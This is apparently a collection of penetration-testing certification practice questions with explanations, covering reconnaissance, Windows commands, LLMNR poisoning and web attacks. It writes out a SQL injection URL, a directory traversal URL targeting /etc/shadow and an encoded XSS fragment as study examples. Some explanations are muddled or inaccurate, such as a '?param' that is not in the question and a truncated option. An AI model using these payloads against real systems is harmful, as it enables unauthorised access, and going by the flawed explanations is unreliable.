The link modifier is used to search for any pages that link to the website provided and have the search term anywhere on the page. For example, password link:diontraining.com would return only page results that link to Dion Training's website and have the text "password" anywhere on the page. The site modifier is used to search only the specified website for results that contain the search term. For example, password site:diontraining.com would return only results for the word password on pages located on the Dion Training website. The inurl modifier is used to search for any pages whose URLs include the term specified and have the search term anywhere on the page. For example, password inurl:diontraining.com would return only page results whose URLs include the text "diontraining.com" and have the text "password" somewhere on the page. The inanchor modifier is used to search for any pages whose anchor text includes the specified term and has the search term provider somewhere on the page. For example, password inanchor:diontraining.com would return only page results that contain diontraining.com in the anchor text and have the search term "password" anywhere on the page.

During active reconnaissance, a penetration tester conducts a vulnerability scan. The most recent scan found several vulnerabilities on an organization's public-facing IP addresses. Which of the following vulnerabilities should the penetration tester attempt first in their exploitation phase? A. An HTTP response that reveals an internal IP address B. A cryptographically weak encryption cipher C. A website utilizing a self-signed SSL certificate D. A buffer overflow that is known to allow remote code execution

The most serious vulnerability discovered is one that could allow remote code execution to occur. Since this buffer overflow vulnerability is known to allow remote code execution, the penetration tester should attempt it first. If this is successfully exploited, the penetration tester should immediately notify the organization so it can be prioritized for remediation immediately to prevent a future security breach. While the other issues may provide information or access for the penetration tester, the most critical would be a remote code execution vulnerability on a public-facing IP address.

You have been given access to a Windows system located on an Active Directory domain as part of a known environment penetration test. Which of the following commands would provide information about other systems on this network? A. net config B. net group C. net user D. net view

The net view command will list all the domains, computers, or resources (like network shares) that are being shared by the specified workstation. This will help to identify file servers and print servers on the network. The net group command can only be used on domain controllers. The net config command will allow servers and workstations services to be controlled once they have already been identified. The net user command would show any user accounts on the local Windows workstation you are using.

Dion Training Solutions has just installed a backup generator for their offices that use SCADA/ICS for remote monitoring of the system. The generator's control system has an embedded cellular modem that periodically connects to the generator's manufacturer to provide usage statistics. The modem is configured for outbound connections only, and the generator has no data connection with any of Dion Training's other networks. The manufacturer utilizes data minimization procedures and uses the data to recommend preventative maintenance service and ensure maximum uptime and reliability by identifying parts that need to be replaced. Which of the following cybersecurity risk is being assumed in this scenario? A. There is a minimal risk being assumed since the cellular modem is configured for outbound connections only B. There is a high risk being assumed since the presence of a cellular modem could allow an attacker to remotely disrupt the generator C. There is a critical risk being assumed since the cellular modem represents a threat to the enterprise network if an attacker exploits the generator and then pivots the production environment. D. There is a medium risk being assumed since the manuf

There is a minimal risk being assumed in this scenario since the cellular modem is configured for outbound connections only. This also minimizes the risk of an attacker gaining remote access to the generator. The generator is logically and physically isolated from the rest of the enterprise network, so even if an attacker could exploit the generator, they could not pivot into the production network. While there is a risk of the manufacturer using the data for purposes other than originally agreed upon, this is a minimal risk due to the manufacturer's data minimization procedures and the type of data collected. Should the manufacturer choose to use usage statistics about the generator for some other purpose, it would have a negligible impact on the company since it does not contain any PII or proprietary company data.

Jason is conducting a penetration test against an organization's Windows network. He then enters a command into the shell and receives the following output: VulnerableService C:\Program Files\A Based on the output above, which of the following types of vulnerabilities does this Windows system contain? A. Writeable services B. Unsecure file/folder permissions C. Unquoted service path D. Clear text credentials in LDAP

This Windows machine contains an unquoted service path vulnerability, as shown in the output. If a service is created with an executable path that contains spaces and is not enclosed within quotes, then an unquoted service path vulnerability exists. In Windows, if the service is not enclosed within quotes and is having spaces, it would handle the space as a break and pass the rest of the service path as an argument. If the service involved has SYSTEM privileges, an attacker could exploit this vulnerability and gain SYSTEM level access. This command finds the service name, executable path, the display name of the service, and auto starts in all the directories except C:\Windows\ (since by default there is no such service that has spaces and is unquoted in this folder). As shown in the output, the service called "VulnerableService" has an unquoted service path.

While conducting a penetration test of a web application, you enter the following URL, http://test.diontraining.com/index.php?id=1%20OR%2017-7%3d10. What type of exploit are you attempting? A. Session hijacking B. Buffer overflow C. SQL injection D. XML injection

This is an example of a Boolean-based SQL injection. This occurs when data input by a user is interpreted as a SQL command rather than as normal data by the backend database. In this example, notice that the statement being parsed as part of the URL after the equal sign is equivalent to 1 or 17-7=10. This means the portion of the statement that is 17-7=10 would return a value of 1 (since it is true). Then, we are left to compute if 1 = 1, and since it does, the SQL database will treat this as a positive authentication. This is simply an obfuscation technique of a 1=1 SQL injection technique. A buffer overflow is an exploit that attempts to write data to a buffer and exceed that buffer's boundary to overwrite an adjacent memory location. A session hijacking attack consists of exploiting the web session control mechanism, normally managed for a session token. XML Injection is an attack technique used to manipulate or compromise an XML application or service's logic.

Susan, a penetration tester is attempting to conduct an application-based attack against a test and development server. Susan enters the following URL, html;base64,PHNjcmlwdD5hbGVydCgnS== to attempt the attack. What type of attack is being attempted? A. Password spraying B. Cross-site scripting C. SQL injection D. XML injection

This is an example of a URL-based XSS (cross-site scripting) attack. A cross-site scripting attack uses a specially crafted URL that includes attack code that will cause information that users enter into their web browser to be sent to the attacker. In this example, everything from ?param onward is part of the attack. You can see the base64 encoded string being used. While you could not convert it during the exam without a base64 decoder, you should be able to tell that it is not a SQL injection nor an XML injection based on your studies. It is also not an attempt to conduct password spraying by logging into different usernames with the same password. So, by process of elimination, you can determine this is an XSS attack.

While conducting a penetration test of a web application, you enter the following URL, http://test.diontraining.com/../../../../etc/shadow. What type of exploit are you attempting? A. Buffer overflow B. XML injection C. SQL injection D. Directory traversal

This is an example of a directory traversal. A directory traversal attack aims to access files and directories that are stored outside the webroot folder. By manipulating variables or URLs that reference files with "dot-dot-slash (../)" sequences and its variations or using absolute file paths, it may be possible to access arbitrary files and directories stored on the file system, including application source code or configuration and critical system files. A buffer overflow is an exploit that attempts to write data to a buffer and exceed that buffer's boundary to overwrite an adjacent memory location. XML Injection is an attack technique used to manipulate or compromise an XML application or service's logic. SQL injection is the placement of malicious code in SQL statements via web page input.

Stephane was asked to assess the technical impact of a reconnaissance performed against his organization. He has discovered that a third party has been performing reconnaissance by querying the organization's WHOIS data. Which category of technical impact should he classify this as? A. High B. Medium C. Low D. Critical

This would be best classified as a low technical impact. Since WHOIS data about the organization's domain name is publicly available, it is considered a low impact. This is further mitigated by the fact that your company gets to decide what information is published in the WHOIS data. Since only publicly available information is being queried and exposed, this can be considered a low impact.

You have been contracted to conduct a wireless penetration test for a corporate client. Which of the following should be documented and agreed upon in the scoping documents before you begin your assessment? A. The number of wireless access points and devices used by the client B. The network diagrams with the SSIDs of the wireless access points used by the client C. The frequencies of the wireless access points and devices used by the client. D. The make and model of the wireless access points used by the client

To ensure you are not accidentally targeting another organization's wireless infrastructure during your penetration test, you should have the frequencies of the wireless access points and devices used by the client documented in the scoping documents. This would include whether your clients use Wireless A, B, G, N, AC, or AX and if they are using the 2.4 GHz or 5.0 GHz spectrum for their communications. Often, this scoping document will also include the SSID names to ensure the penetration tester is assessing the wireless network owned by the organization and not someone else's by mistake.

You are conducting reconnaissance against Dion Training for an upcoming engagement. Last week, you read a press release on their website that mentioned a new security infrastructure being deployed soon, but you cannot remember the exact date for the deployment. You tried to navigate back to the press release on their website, but it seems to have been taken down. Which of the following can you use to find a copy of the press release? (Select TWO) A. Use a standard cache search by entering cache:https://diontraining.com B. Conduct a website crawl of https://diontraining.com to find the hidden document C. Use a network sniffer to capture API requests and responses from the site D. Use a website archive like archive.org to find a copy of the press release

To obtain older website information, you can use a standard cache search or a website archive. A standard cache search will produce a recent view of the website, but if the document you need has been removed for a long time this will be ineffective. Website archives like archive.org (home of the Wayback Machine) create cached and archived copies of billions of web pages going back decades. A network sniffer to capture API requests and responses is a form of active reconnaissance but it would not be useful in finding a specific webpage like the press release in this scenario. Conducting a website crawl can find hidden documents that are not indexed by search engines, but it will not find a document that has been removed or taken offline.

During the reconnaissance phase of a penetration test, you have determined that your client's employees all use iPhones that connect back to the corporate network over a secure VPN connection. Which of the following methods would MOST likely be the best method for exploiting these? A. Use social engineering to trick a user into opening a malicious APK B. Identify a jailbroken device for easy exploitation C. Use web-based exploits against the devices web interfaces D. Use a tool like ICSSPLOIT to target a specific vulnerabilities

When targeting mobile devices, you must first determine if the company uses iPhones or Android-based devices. If they are using an iPhone, it becomes much more difficult to attack since iPhone users can only install trusted apps from the App Store. If the user has jailbroken their phone, they can sideload apps and other malware. After identifying a jailbroken device, you can use social engineering to trick the user into installing your malicious code and then take control of their device.

You are planning to exploit a network-based vulnerability against an organization as part of a penetration test. You attempted to connect your laptop to the network jack in their conference room. You found yourself in the highly restricted VLAN that the organization allows its visitors to connect to when conducting presentations. This VLAN only allows you to access the internet, not the internal network. You decide you need to conduct VLAN hopping. Which of the following methods would be MOST likely to succeed? A. Harvest the user credentials of an employee and use those to connect B. Spoof the MAC address of the room's VOIP phone to your laptop C. Poison or overflow the MAC table of the switch D. Connect a wireless access point to the conference room's network jack

VLAN hopping is the act of illegally moving from one VLAN to another. A VLAN (virtual LAN) is a logical grouping of switch ports extending across any number of switches on an Ethernet network. One of the most common VLAN hopping methods is to overflow the MAC table on a vulnerable switch. When this occurs, the switch defaults to operating as a hub and repeats all frames being received through all of its ports. This "fail open" method ensures the network can continue to operate, but it is a security risk that can be exploited by the penetration tester

Which of the following is the most difficult to confirm with an external vulnerability scan? A. Cross-site request forgery (XSRF/CSRF) B. Unpatched web server C. Cross-site scripting (XSS) D. Blind SQL injection

Vulnerability scanners typically cannot confirm that a blind SQL injection with the execution of code has previously occurred. XSS and CSRF/XSRF are typically easier to detect because the scanner can pick up information that proves a successful attack. The banner information can usually identify unpatched servers.

What system contains a publicly available set of databases with registration contact information for every domain name on the Internet? A. IETF B. CAPTCHA C. IANA D. WHOIS

WHOIS is a query and response protocol widely used for querying databases that store the registered users or assignees of an Internet resource, such as a domain name, an IP address block, or an autonomous system. WHOIS also is used for a broader range of information. The protocol stores and delivers database content in a human-readable format and is publicly available for use. The Internet Assigned Numbers Authority is a standards organization that oversees global IP address allocation, autonomous system number allocation, root zone management in the Domain Name System, media types, and other Internet Protocol-related symbols and Internet numbers. A CAPTCHA is a type of challenge-response test used in computing to determine whether the user is human. The Internet Engineering Task Force (IETF) is an open standards organization that develops and promotes voluntary Internet standards, particularly the standards that comprise the Internet protocol suite.

You have conducted a Google search for the "site:diontraining.com -site:sales.diontraining.com financial." What results do you expect to receive? A. Google results for keyword matches on diontraining.com and sales.diontraining.com that include the word "financial" B. Google results for keyword matches from the site sales.diontraining.com that are in the domain diontraining.com but do not include the word financial C. Google results matching all words in the query D. Google results matching "financial" in domain diontraining.com, but no results from the site sales.diontraining.com

When conducting a Google search, using site:AAA in the query will return results only from that website (AAA). If you use -site:AAA, you will get results not explicitly on the website (AAA). In the case of this question, no results should show up from sales.diontraining.com. All results should only come from diontraining.com

A penetration tester is conducting software assurance testing on a web application for Dion Training. You discover the web application is vulnerable to an SQL injection and could disclose a regular user's password. Which of the following actions should you perform? A.Recommend that the company conduct a full penetration test of their systems to identify other vulnerabilities B. Document the finding with an executive summary, methodology used, and a remediation recommendation C. Conduct a proof-of-concept exploit on three user accounts at random and document this in your report D. Contact the development team directly and recommend adding input validation to the web application

When you find a vulnerability, it should be documented fully. This includes providing an executive summary for management, the methodology used to find the vulnerability so that others can recreate and verify it, and the recommendation remediation actions that should be taken. You should not exploit three random accounts on the server, which could negatively impact the client's reputation. You should not contact the development team directly since they may ignore your recommendation, and they did not hire you. While it may be a good idea to conduct a full-scale penetration test, that would not necessarily solve this vulnerability.

You are reverse engineering a malware sample using the Strings tool when you notice the code inside appears to be obfuscated. You look at the following line of output on your screen: asdfghkloiuytrewsxcvbnuDFRDCVBNJYTF Based on the output above, which of the following methods do you believe the attacker used to prevent their malicious code from being easily read or analyzed? A. QR coding B. Base64 C. XML D. SQL

While there are many different formats used by attackers to obfuscate their malicious code, Base64 is by far the most popular. If you see a string like the one above, you can decode it using an online Base64 decoder. I recommend you copy the string above and decode it to see how easy it is to reverse a standard Base64 encoded message. Some more advanced attackers will also use XOR and a key shift in combination with Base64 to encode the message and make it harder to decode, but using a tool like CyberChef can help you decode those. Structured Query Language (SQL) is used to communicate with a database. Extensible Markup Language (XML) is a markup language that defines a set of rules for encoding documents in a human-readable and machine-readable format. SQL and XML are not considered obfuscation techniques. A QR Code is a two-dimensional version of the barcode, known from product packaging in the supermarket. QR coding is the process of converting some data into a single QR code. QR coding might be considered a form of obfuscation, but it is not shown in this question's example output.

You are conducting a network-based exploit against a Windows-based network. After running Responder in Kali Linux for about 15 minutes, you see the following output on your screen: Poisoned answer sent to *IP* for name wpad To validate if your attack was successful, you also analyze a Wireshark packet capture of this attack. A portion of that Wireshark packet capture is shown here: Source -> Destination -> Protocol LLMNR -> Standard query A. wpad Based on the output and packet capture above, which of the following types of exploits did you use? A. FTP exploit B. LLMNR exploit C. DNS cache poisoning D. Pass the hash attack

Windows computers do not rely on DNS for name resolution within the internal networks. Instead, they rely on NetBIOS Name Service (NBNS) queries. Since Windows Vista, though, NBNS queries have been replaced with the Link-Local Multicast Name Resolution (LLMNR) protocol. The Responder tool in Kali Linux is used to conduct NBNS, LLMNR, and DNS name resolution exploits. In this example, Responder is being used to answer the Windows host asking for name resolution for the system called "wpad" but provides the IP for the Kali Linux machine instead of the correct IP. The first highlighted section shows the LLMNR query for the host "wpad" being sent by the Windows 7 host and answered by the Kali host running Responder. The last highlighted section shows the Windows 7 host getting the wpad.dat file by providing their credentials to the Kali host. There are several clues in this question to the right answer. First, the question mentions that you waited 15 minutes. Within Windows networks, the older NetBIOS system, each Windows machine would send out a broadcast message with its IP and WINS name every 10-15 minutes. Some of this functionality remains within LLMNR, too. But, the easier clue to identify is from the Wireshark packet capture. It clearly shows the protocol being used in lines 1212 through 1216 as LLMNR during the query and response. For this question, I was even nice enough to highlight that portion is red, but don't expect the exam to be nearly as kind!

What command could be used to list the active services from the Windows command prompt? A. sc query \\servername B. sc config C. sc query type= running D. sc query

Windows uses the sc query to display information about the running service. It is part of the Service Control command-line tool, known as sc. The sc config command will modify the value of a service's entries in the registry and the Service Control Manager database. The sc query command will obtain and display information about the specified service, driver, type of service, or driver type. By entering just the sc query, the command will return the information on the active services only. By using the type=running option, only the information on the running service will be displayed. If the command sc query \\servername is used, then the remote server's active services (\\servername) will be displayed.

You are working on a hacking challenge on a Linux server owned by Dion Training. You have already gained initial access to the server and successfully elevated your privileges to root. As part of the challenge, you must locate any sudo commands issued by a user named Terri (whose login account is terri and UID=1003). Which of the following commands would successfully display every instance of the sudo command issued by Terri on this Linux server most efficiently? A. journalctl _UID=1003 | grep -e [Tt]erri | grep -e 1003 | grep sudo B. journalctl _UID=1003 | grep -e 1003 | grep sudo C. journalctl _UID=1003 | grep sudo D. journalctl _UID=1003 | grep -e [Tt]erri | grep sudo

journalctl is a command for viewing logs collected by systemd. The systemd-journald service is responsible for systemd's log collection, and it retrieves messages from the kernel, systemd services, and other sources. These logs are gathered in a central location, which makes them easy to review. If you specify the parameter of _UID=1003, you will only receive entries made under the authorities of the user with ID (UID) 1003. In this case, that is Terri. Using the piping function, we can send that list of entries into the grep command as an input and then filter the results before returning them to the screen. This command will be sufficient to see all the times that Terri has executed something as the superuser using privilege escalation. If there are too many results, we could further filter the results using regular expressions with grep using the -e flag. Since the UID of 1003 is only used by Terri, it is unnecessary to add [Tt]erri to your grep filter as the only results for UID 1003 (terri) will already be shown. So, while all four of these would produce the same results, the most efficient option to accomplish this is by entering "journalctl _UID=1003 | grep sudo" in the terminal. Don't get afraid when you see questions like this; walk through each part of the command step by step and determine the differences. In this question, you may not have known what journalctl is, but you didn't need to. You needed to identify which grep expression was the shortest that would still get the job done. By comparing the differences between the options presented, you could likely take your best guess and identify the right one.